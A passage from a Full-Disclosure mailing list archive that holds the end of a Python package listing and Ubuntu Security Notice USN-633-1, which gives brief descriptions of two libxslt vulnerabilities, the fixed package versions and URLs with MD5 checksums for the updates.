(Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.5-1ubuntu4.1_amd64.deb Size/MD5: 6880894 59fc6616382c6b3be06a5aa0e99ee908 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.5-1ubuntu4.1_amd64.deb Size/MD5: 1623462 de07524181fe7542eb2ec0c4fed8c188 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.5-1ubuntu4.1_amd64.deb Size/MD5: 1051750 468b4a0c355d69c80696c881fb044217 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.5-1ubuntu4.1_amd64.deb Size/MD5: 2911726 70a036abacd3c3ef5247194b060e8bb0 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.2-2ubuntu4.1_amd64.deb Size/MD5: 7934918 8311de45b9e1a0e0935b10921d598ba9 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.2-2ubuntu4.1_amd64.deb Size/MD5: 2036884 ffdb8e536dba3bbd50a55f7e165b50ad http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.2-2ubuntu4.1_amd64.deb Size/MD5: 1256342 9a898e693f08656566eaa11e8cfec1e2 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.2-2ubuntu4.1_amd64.deb Size/MD5: 3018212 02326bdd7eb6ff8b54a9f9a0749f027a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dbg_2.4.5-1ubuntu4.1_i386.deb Size/MD5: 6357278 20f2772f2114370a357bb74bc5fb4ed1 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-dev_2.4.5-1ubuntu4.1_i386.deb Size/MD5: 1486704 318eb4e469300f6523933cb3245fffd1 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4-minimal_2.4.5-1ubuntu4.1_i386.deb Size/MD5: 976528 2dea5ac9a51b3ce713100d1053a86312 http://security.ubuntu.com/ubuntu/pool/main/p/python2.4/python2.4_2.4.5-1ubuntu4.1_i386.deb Size/MD5: 2813212 d1dcfb72638dd943c584b276cfc3a693 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dbg_2.5.2-2ubuntu4.1_i386.deb Size/MD5: 7359816 c11f17e491af48ef2975603db2cce874 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-dev_2.5.2-2ubuntu4.1_i386.deb Size/MD5: 1887972 30a72144a884e19125d46f96eb4e9a07 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5-minimal_2.5.2-2ubuntu4.1_i386.deb Size/MD5: 1175566 fc4522bcd3cfd37d0c2e8a1685010282 http://security.ubuntu.com/ubuntu/pool/main/p/python2.5/python2.5_2.5.2-2ubuntu4.1_i386.deb Size/MD5: 2898404 b467f8e3b32c20575030a38cae4bf8b3 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dbg_2.4.5-1ubuntu4.1_lpia.deb Size/MD5: 6453538 fb5d36acc06c55f3a44e155ba29363a6 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dev_2.4.5-1ubuntu4.1_lpia.deb Size/MD5: 1483110 6c6de10c9e5195668a27a6ce9d55407b http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-minimal_2.4.5-1ubuntu4.1_lpia.deb Size/MD5: 980308 9f93d1ab422e5fe4a22f03d258ae5ee8 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4_2.4.5-1ubuntu4.1_lpia.deb Size/MD5: 2811346 6c9e254561c4a7d12fe191b8675f38cd http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dbg_2.5.2-2ubuntu4.1_lpia.deb Size/MD5: 7464684 0cbc5c070fb53ef2010b9c66a7af502c http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dev_2.5.2-2ubuntu4.1_lpia.deb Size/MD5: 1881994 b5174f4bb8ab70d9eb066adae062abf3 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-minimal_2.5.2-2ubuntu4.1_lpia.deb Size/MD5: 1180302 5e3fbff4ec243011cf91795ecc19d922 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5_2.5.2-2ubuntu4.1_lpia.deb Size/MD5: 2893664 ec96b8ed643304896e28df3d2fb6fcce powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dbg_2.4.5-1ubuntu4.1_powerpc.deb Size/MD5: 7112922 c51953d92698ec4abafafba488503a60 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dev_2.4.5-1ubuntu4.1_powerpc.deb Size/MD5: 1627356 999b775a73118f743cfe77073aa19911 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-minimal_2.4.5-1ubuntu4.1_powerpc.deb Size/MD5: 1075066 162652fcf9d0be540784c15e7058b8c6 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4_2.4.5-1ubuntu4.1_powerpc.deb Size/MD5: 2960838 b598804be180210c6c483d1d5c69e952 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dbg_2.5.2-2ubuntu4.1_powerpc.deb Size/MD5: 8197372 58238bee17c6263da3bd843719936b39 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dev_2.5.2-2ubuntu4.1_powerpc.deb Size/MD5: 2032736 9091810f6e7c7e1e5f149502e6388d9a http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-minimal_2.5.2-2ubuntu4.1_powerpc.deb Size/MD5: 1282966 bd3c93b79c97f0762509b3367a17e61d http://ports.ubuntu.com/pool/main/p/python2.5/python2.5_2.5.2-2ubuntu4.1_powerpc.deb Size/MD5: 3068794 bef00fa11c3adfb7e3b92a33f0ef060d sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dbg_2.4.5-1ubuntu4.1_sparc.deb Size/MD5: 6441580 90d57d762bca5953da492e0e7dbca661 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-dev_2.4.5-1ubuntu4.1_sparc.deb Size/MD5: 1559836 8d40dd82f993c4e792193e64785b32b6 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4-minimal_2.4.5-1ubuntu4.1_sparc.deb Size/MD5: 998482 303ab52af3356ba45d7c15193e4245b7 http://ports.ubuntu.com/pool/main/p/python2.4/python2.4_2.4.5-1ubuntu4.1_sparc.deb Size/MD5: 2828918 7fcfa07199afa36d63d5f51256aea267 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dbg_2.5.2-2ubuntu4.1_sparc.deb Size/MD5: 7435650 f4ae9009a1fd3809a5b0848f44cf9a9f http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-dev_2.5.2-2ubuntu4.1_sparc.deb Size/MD5: 1974952 60cf295076b2d6a7ecec4f606ca1c08b http://ports.ubuntu.com/pool/main/p/python2.5/python2.5-minimal_2.5.2-2ubuntu4.1_sparc.deb Size/MD5: 1199130 1491c043e971f7f67b9306a309905ed3 http://ports.ubuntu.com/pool/main/p/python2.5/python2.5_2.5.2-2ubuntu4.1_sparc.deb Size/MD5: 2921542 45322b5997c0cf7406471d8f0087f7e4 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 227 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080801/a99abe8c/attachment.bin From kees at ubuntu.com Fri Aug 1 16:26:31 2008 From: kees at ubuntu.com (Kees Cook) Date: Fri, 1 Aug 2008 08:26:31 -0700 Subject: [Full-disclosure] [USN-633-1] libxslt vulnerabilities Message-ID: <20080801152631.GE21348@outflux.net> =========================================================== Ubuntu Security Notice USN-633-1 August 01, 2008 libxslt vulnerabilities CVE-2008-1767, CVE-2008-2935 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libxslt1.1 1.1.15-1ubuntu1.2 Ubuntu 7.04: libxslt1.1 1.1.20-0ubuntu2.2 Ubuntu 7.10: libxslt1.1 1.1.21-2ubuntu2.2 Ubuntu 8.04 LTS: libxslt1.1 1.1.22-1ubuntu1.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that long transformation matches in libxslt could overflow. If an attacker were able to make an application linked against libxslt process malicious XSL style sheet input, they could execute arbitrary code with user privileges or cause the application to crash, leading to a denial of serivce. (CVE-2008-1767) Chris Evans discovered that the RC4 processing code in libxslt did not correctly handle corrupted key information. If a remote attacker were able to make an application linked against libxslt process malicious XML input, they could crash the application, leading to a denial of service. (CVE-2008-2935) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.15-1ubuntu1.2.diff.gz Size/MD5: 64266 cf69a61672e61f708158980c7783ec87 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.15-1ubuntu1.2.dsc Size/MD5: 901 b434ae6f23ddc2f7e87e42ee72b9697d http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.15.orig.tar.gz Size/MD5: 2657197 238de9eda71b570ff7b78aaf65308fc6 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/libx/libxslt/python-libxslt1_1.1.15-1ubuntu1.2_all.deb Size/MD5: 7918 7161007248bac7267ee7f5aa5dab3011 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.15-1ubuntu1.2_amd64.deb Size/MD5: 541836 103a0da6902354830120a7952cce618f http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.15-1ubuntu1.2_amd64.deb Size/MD5: 210278 9adf228fcce713c593268a5276655c2b http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python2.4-libxslt1_1.1.15-1ubuntu1.2_amd64.deb Size/MD5: 118280 c8d9b1fdda773b5d06fd72a72b191a54 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.15-1ubuntu1.2_amd64.deb Size/MD5: 96024 96fae1681c7a3729a502955e2f66a95c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.15-1ubuntu1.2_i386.deb Size/MD5: 519334 9f8db410faec033dc3cff889cf36f9d2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.15-1ubuntu1.2_i386.deb Size/MD5: 195678 497843da4c7d88763eee863ec3914c07 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python2.4-libxslt1_1.1.15-1ubuntu1.2_i386.deb Size/MD5: 114540 f154fed16a115a4094dbb230ef0da63e http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.15-1ubuntu1.2_i386.deb Size/MD5: 95104 9e3137adb1d806a64ecbf35cdb37165e powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.15-1ubuntu1.2_powerpc.deb Size/MD5: 549370 7cdc93d810d869b7258ef8586d36c6ec http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.15-1ubuntu1.2_powerpc.deb Size/MD5: 206948 ebc3e8cd756ae02015c3374bc21025a8 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python2.4-libxslt1_1.1.15-1ubuntu1.2_powerpc.deb Size/MD5: 116582 ee0a5989a52bb6618251e085949b91f1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.15-1ubuntu1.2_powerpc.deb Size/MD5: 97538 7244b184d0a04f74b735244b9b8b557f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.15-1ubuntu1.2_sparc.deb Size/MD5: 538122 c2a61153dd8439d5680f90e8821d5a4c http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.15-1ubuntu1.2_sparc.deb Size/MD5: 202950 6357aec33fa998ae1ffa665e896b63f3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python2.4-libxslt1_1.1.15-1ubuntu1.2_sparc.deb Size/MD5: 115700 c804e21a583ad8728011bec63d3d0624 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.15-1ubuntu1.2_sparc.deb Size/MD5: 95702 814d52674a3128d4fe3e5b655e512dc4 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.20-0ubuntu2.2.diff.gz Size/MD5: 31176 ad0cfaa93c0c751b82d698273e2fa8de http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.20-0ubuntu2.2.dsc Size/MD5: 1025 a94480392f924017018e3438e5923f04 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.20.orig.tar.gz Size/MD5: 3689759 4ea2dc22a23bf2aa570f868aa86357f8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.20-0ubuntu2.2_amd64.deb Size/MD5: 363690 4d8e0b3533ab4d53eea4bb5b5253f1f9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.20-0ubuntu2.2_amd64.deb Size/MD5: 608510 838f1a4a1170f2307d28b53d6f9cf46b http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.20-0ubuntu2.2_amd64.deb Size/MD5: 229840 5121bb96c07a576309d87fa7151c9b5d http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.20-0ubuntu2.2_amd64.deb Size/MD5: 268506 827d70aaaaaf64977589faa2978e46b4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.20-0ubuntu2.2_amd64.deb Size/MD5: 159374 48b849d13858eab3dd4939e4ba3ffe28 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.20-0ubuntu2.2_amd64.deb Size/MD5: 108208 4ce2d5f3e30fa38391f2cfb8122ec811 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.20-0ubuntu2.2_i386.deb Size/MD5: 348208 a78bbe76123b499723915648c0977f46 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.20-0ubuntu2.2_i386.deb Size/MD5: 590508 6ee5ddf8795368a4c3a9bb99cbdac70d http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.20-0ubuntu2.2_i386.deb Size/MD5: 218758 9f4d59fa825ea0a6bf1c5a2a6750155b http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.20-0ubuntu2.2_i386.deb Size/MD5: 247416 ae7c0c7ceadc522f0b5494c767ebf23d http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.20-0ubuntu2.2_i386.deb Size/MD5: 153158 3a94fd4c9e96b4e9d0917fbd35860b55 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.20-0ubuntu2.2_i386.deb Size/MD5: 107320 4c788703060a0f5d5c76c9fa8a374418 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.20-0ubuntu2.2_powerpc.deb Size/MD5: 363428 f88c2ef73133684e83fd8fef79414d47 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.20-0ubuntu2.2_powerpc.deb Size/MD5: 617434 7c19b73e0e77ec34592318c2833737c9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.20-0ubuntu2.2_powerpc.deb Size/MD5: 234612 3568043063885c8159d0d06b7480d345 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.20-0ubuntu2.2_powerpc.deb Size/MD5: 271254 09db21b96b201ab40d0111a02ab53eb7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.20-0ubuntu2.2_powerpc.deb Size/MD5: 159684 182a5a84ce93c43d680910261a66fed8 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.20-0ubuntu2.2_powerpc.deb Size/MD5: 110904 6ff6e079f8406b01823440c0d7899cb5 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.20-0ubuntu2.2_sparc.deb Size/MD5: 336696 c4e756c6e27623817320a501ca7098d1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.20-0ubuntu2.2_sparc.deb Size/MD5: 603682 b49e0aafcc966bc2e2a83d6d67d69876 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.20-0ubuntu2.2_sparc.deb Size/MD5: 221856 dcb03fb5e96fd95c4074b7f6635b3ca6 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.20-0ubuntu2.2_sparc.deb Size/MD5: 250254 de0dd392ffe9c17e316c2343c6b54b9e http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.20-0ubuntu2.2_sparc.deb Size/MD5: 154234 9161b281ea1b2ed55d22502c3d2a6761 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.20-0ubuntu2.2_sparc.deb Size/MD5: 108298 0415840880ef71235788ceac153a78c3 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.21-2ubuntu2.2.diff.gz Size/MD5: 191877 788089a700761fb82128b6cc1c4d350f http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.21-2ubuntu2.2.dsc Size/MD5: 1026 5b742326922b28bf564197640966e5cb http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.21.orig.tar.gz Size/MD5: 2780016 59fe34e85692f71df2a38c2ee291b3ca amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.21-2ubuntu2.2_amd64.deb Size/MD5: 362298 6b92220e91857ee34eab9914ee101a59 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.21-2ubuntu2.2_amd64.deb Size/MD5: 612778 e44b1bd1d80bcbcf0933ac18865e78b1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.21-2ubuntu2.2_amd64.deb Size/MD5: 231648 d139e9b0ce7b736be9f39a9b703ac090 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.21-2ubuntu2.2_amd64.deb Size/MD5: 267688 e3603768baf61a937467d6094e854ff6 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.21-2ubuntu2.2_amd64.deb Size/MD5: 160536 bb86459b4652221971b4beddf571c697 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.21-2ubuntu2.2_amd64.deb Size/MD5: 109520 2dfb1b0a34ca36ae7a37eb671ebd6f58 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.21-2ubuntu2.2_i386.deb Size/MD5: 349154 925a6c3de50381aa9859e8f4e8639c54 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.21-2ubuntu2.2_i386.deb Size/MD5: 595214 2226664f0469540c4def7973227251f7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.21-2ubuntu2.2_i386.deb Size/MD5: 220254 2786a031e34e8713f39b6673b4fd6b8d http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.21-2ubuntu2.2_i386.deb Size/MD5: 248028 7a0536b5e5c6d8c103ea4702ef12461d http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.21-2ubuntu2.2_i386.deb Size/MD5: 154744 1f7a80c73a5c8f51f4f8293da387b41a http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.21-2ubuntu2.2_i386.deb Size/MD5: 108660 adc4d45e5f4659deb565edc6b8036c0d lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dbg_1.1.21-2ubuntu2.2_lpia.deb Size/MD5: 353478 cf471cf9aebbf7ebe4b5813817e2319e http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dev_1.1.21-2ubuntu2.2_lpia.deb Size/MD5: 597170 e5824caafac76c93bbf7a0e7553ce664 http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1.1_1.1.21-2ubuntu2.2_lpia.deb Size/MD5: 220726 0def64d849054146ff8ad46ca23f7e56 http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.21-2ubuntu2.2_lpia.deb Size/MD5: 253318 4fb6e71fdbd8ec1028e610cd416da4b5 http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1_1.1.21-2ubuntu2.2_lpia.deb Size/MD5: 153676 681f9ae104d06073b3a8f94b20894dad http://ports.ubuntu.com/pool/main/libx/libxslt/xsltproc_1.1.21-2ubuntu2.2_lpia.deb Size/MD5: 108710 a280424aee4ced880986bb330f9b9c8c powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.21-2ubuntu2.2_powerpc.deb Size/MD5: 362880 5cf6a137cd3a6df672cdf0918a733f4d http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.21-2ubuntu2.2_powerpc.deb Size/MD5: 621898 fe708fb294bf10a4fba4280d737edafa http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.21-2ubuntu2.2_powerpc.deb Size/MD5: 236082 6e9b2f0fce8f7dd2f8e65796b38ea61e http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.21-2ubuntu2.2_powerpc.deb Size/MD5: 271266 ba18540b950362b23b1d896ed115be57 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.21-2ubuntu2.2_powerpc.deb Size/MD5: 160772 b4240dbc0e1f26e7630b37f8313bbc18 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.21-2ubuntu2.2_powerpc.deb Size/MD5: 112182 0286d069b6091120cab9ff40c0a61ab4 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.21-2ubuntu2.2_sparc.deb Size/MD5: 336228 be25bcc2d4647942a3cdfcc133236b0c http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.21-2ubuntu2.2_sparc.deb Size/MD5: 609024 bdd5f270d76a95d1cb250c5134b2d32f http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.21-2ubuntu2.2_sparc.deb Size/MD5: 223384 d13ccffe0f7aa359367537d1889a7a45 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.21-2ubuntu2.2_sparc.deb Size/MD5: 250396 c658547ab958a5e76e2877f952b0b85a http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.21-2ubuntu2.2_sparc.deb Size/MD5: 155564 51d9bf29b67cbf6a16ffb7cf994081b1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.21-2ubuntu2.2_sparc.deb Size/MD5: 109618 260b74e4502517b319952e07a7d85d09 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.22-1ubuntu1.2.diff.gz Size/MD5: 150251 51649bee162255c1cda225fceb74f7e2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.22-1ubuntu1.2.dsc Size/MD5: 1026 7e45b5d02e8be4204a38f8c9888489fc http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt_1.1.22.orig.tar.gz Size/MD5: 2783003 d6a9a020a76a3db17848d769d6c9c8a9 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.22-1ubuntu1.2_amd64.deb Size/MD5: 359522 698e72117365fc5b259901ac45ee7248 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.22-1ubuntu1.2_amd64.deb Size/MD5: 613764 99aaa0b0e2b881771335008db19393d3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.22-1ubuntu1.2_amd64.deb Size/MD5: 230260 75deee14dd7c733c0ed1305e266e8b41 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.22-1ubuntu1.2_amd64.deb Size/MD5: 269988 5c56866bba98156c2496c6ab941a0862 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.22-1ubuntu1.2_amd64.deb Size/MD5: 161132 ba7a93754445906dd095917140122f94 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.22-1ubuntu1.2_amd64.deb Size/MD5: 110106 6d72c0beec8f5ad605f1e1f908f3d657 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dbg_1.1.22-1ubuntu1.2_i386.deb Size/MD5: 344904 cf58efe7caa274026b267df6e4db4614 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1-dev_1.1.22-1ubuntu1.2_i386.deb Size/MD5: 596700 f61063f709ae6a183e45ef83a210d534 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/libxslt1.1_1.1.22-1ubuntu1.2_i386.deb Size/MD5: 219764 74a7de7d0e7167d57ea722165c9cafc6 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.22-1ubuntu1.2_i386.deb Size/MD5: 254216 7d0bf14d7fafac0803a3bd7bff7da95e http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/python-libxslt1_1.1.22-1ubuntu1.2_i386.deb Size/MD5: 155034 c77e26dedadebd59100f177594f53781 http://security.ubuntu.com/ubuntu/pool/main/libx/libxslt/xsltproc_1.1.22-1ubuntu1.2_i386.deb Size/MD5: 109286 09cfbd1588efc34815796206ed71e646 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dbg_1.1.22-1ubuntu1.2_lpia.deb Size/MD5: 351186 c02d1b4df1dc37425f3c1ff04d7af912 http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dev_1.1.22-1ubuntu1.2_lpia.deb Size/MD5: 598572 78dffcebdb6df1e585882cd9ff18ab47 http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1.1_1.1.22-1ubuntu1.2_lpia.deb Size/MD5: 219616 bcb4873e55651abd183a1caf621ac784 http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.22-1ubuntu1.2_lpia.deb Size/MD5: 253246 b0948dec06fdec29cdac3e79abb760d8 http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1_1.1.22-1ubuntu1.2_lpia.deb Size/MD5: 153898 17655039f2965f06709f63263db54bdd http://ports.ubuntu.com/pool/main/libx/libxslt/xsltproc_1.1.22-1ubuntu1.2_lpia.deb Size/MD5: 109320 117af5dfe0c562e30fe61b8cd5267533 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dbg_1.1.22-1ubuntu1.2_powerpc.deb Size/MD5: 358558 71a69fd2d974158fc85c07879a4e4e63 http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1-dev_1.1.22-1ubuntu1.2_powerpc.deb Size/MD5: 624338 ef61b076b890411f689aaabc1cb5b24f http://ports.ubuntu.com/pool/main/libx/libxslt/libxslt1.1_1.1.22-1ubuntu1.2_powerpc.deb Size/MD5: 235338 a4793bbaf523df172e4e7338bd741361 http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1-dbg_1.1.22-1ubuntu1.2_powerpc.deb Size/MD5: 268036 c6ebb4a2ca1262040b635580d6045ded http://ports.ubuntu.com/pool/main/libx/libxslt/python-libxslt1_1.1.22-1ubuntu1.2_powerpc.deb Size/MD5: 160524 def0bc29804f7adccab74433ce3512dc http://ports.ubuntu.com/pool/main/libx/libxslt/xsltproc_1.1.22-1ubuntu1.2_powerpc.deb Size/MD5: 112754 7ed9b642be56b9c7dd93def00a3ff681 sparc architecture (Sun SPARC/UltraSPARC): 